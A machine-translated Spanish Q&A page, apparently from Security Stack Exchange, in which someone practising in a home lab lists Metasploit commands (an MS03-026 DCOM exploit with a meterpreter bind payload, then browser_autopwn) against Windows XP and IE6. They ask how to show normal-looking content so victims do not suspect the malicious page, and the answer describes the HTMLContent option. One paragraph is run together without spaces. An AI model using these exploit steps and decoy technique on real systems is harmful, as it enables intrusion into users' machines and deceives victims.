Cómo editar una página web maliciosa en BindTCP

1

Estoy estudiando Ethical Hacking, usando BindTCP en Metasploit, Kali Linux.

Este video muestra los pasos , y exploté con éxito un Windows XP sin parches con un IE 6 vulnerable (en mi red personal VMWare).

La premisa es conseguir que la víctima visite una página web. Hacer esto le permitirá al atacante obtener una sesión de meterpreter, accediendo a la máquina víctima

.

Pero cuando la víctima hace clic en la página, está en blanco, lo que a su vez genera sospechas.

Pregunta: ¿Cómo editar la página web para que tenga contenido de aspecto normal?

Esto es lo que hice:

root > sudo msfconsole
msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit (ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit (ms03_026_dcom) > set RHOST 192.168.1.9
msf exploit (ms03_026_dcom) > set RPORT 445
msf exploit (ms03_026_dcom) > use auxiliary/server/browser_autopwn
msf auxiliary (browser_autopwn) > set LHOST 192.168.1.10
msf auxiliary (browser_autopwn) > exploit

.....

Después de encontrar exploits, inicia varios servidores junto con enlaces, luego concluye con

Cuandoabroelenlaceenlamáquinavíctima(usandoIE6),comienzalasesióndemeterpreterenKaliLinux,

perolavíctimaveunapáginawebenblancoconladirecciónweboriginal.Porfavor,apúntameenladireccióncorrecta.¿Cómopuedobuscartutorialesquemuestrencómoeditarunapáginawebmaliciosaparalavíctima?Gracias!

    
pregunta Rhonda 24.07.2016 - 01:00
fuente

1 respuesta

2

Browser Autopwn tiene una opción HTMLContent, que te permite mostrar una página personalizada en lugar de la habitual, en blanco.

Cotizando Rapid7 :

  

La opción HTMLContent le permite servir una página web HTML básica en el navegador en lugar de tener una página en blanco. Es compatible con dos sintaxis:

     

establece HTMLContent Hello world!

     

El ejemplo anterior básicamente imprimirá "¡Hola mundo!" en el navegador mientras se explotan las vulnerabilidades contra él. Aquí hay otro:

     

establezca el archivo HTMLContent: //tmp/hello_world.html

     

El ejemplo anterior cargará el archivo /tmp/hello_world.html y eso es lo que verá el navegador. Lo más probable es que la segunda sintaxis sea la forma en que querría usar la opción Contenido.

     

Tenga en cuenta que probablemente debería tratar de mantener el contenido de HTMLC lo más simple posible, de lo contrario existe la posibilidad de que pueda influir en la confiabilidad de las vulnerabilidades, especialmente las que dañan la memoria.

Además, este enlace es el primer resultado de búsqueda de Google para "browser autopwn" "blank". No quiero ser grosero, pero creo que, antes de comenzar a lanzar exploits a la izquierda y a la derecha, deberías poder investigar los problemas por tu cuenta. Stackexchange y otros foros pueden ser útiles, pero cuando va a hacer este tipo de trabajo como trabajo, es posible que no tenga tiempo suficiente para esperar una respuesta.

Google (o DuckDuckgo, o alternativas similares) + man / show options / ... recorrerán un largo camino.

    
respondido por el A. Darwin 24.07.2016 - 09:52
fuente

Lea otras preguntas en las etiquetas